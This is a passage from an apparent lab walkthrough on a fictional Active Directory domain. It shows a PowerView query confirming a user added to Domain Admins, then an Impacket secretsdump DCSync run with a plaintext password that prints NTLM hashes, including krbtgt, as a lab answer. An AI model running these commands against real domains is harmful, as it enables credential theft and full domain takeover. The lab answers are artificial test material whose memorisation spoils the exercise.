Get-DomainGroupMember -Identity 'Domain Admins'


GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : AB920
MemberDistinguishedName : CN=AB920,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3327542485-274640656-2609762496-4610

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3327542485-274640656-2609762496-500

It worked. We can now perform a DCSync and retrieve the krbtgt hash.

Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.

In my case I simply used secretsdump:

secretsdump.py -just-dc AB920:weasal@172.16.7.3 -outputfile dcsync_hashes
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:234a798328eb83fda24119597ffba70b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7eba70412d81c1cd030d72a3e8dbe05f:::

I didn't restrict which account to dump. You can add "-just-dc-user inlanefreight/krbtgt" to retrieve only the krbtgt hash.

(Figure: BloodHound result for 'Find Shortest Paths to Domain Admins')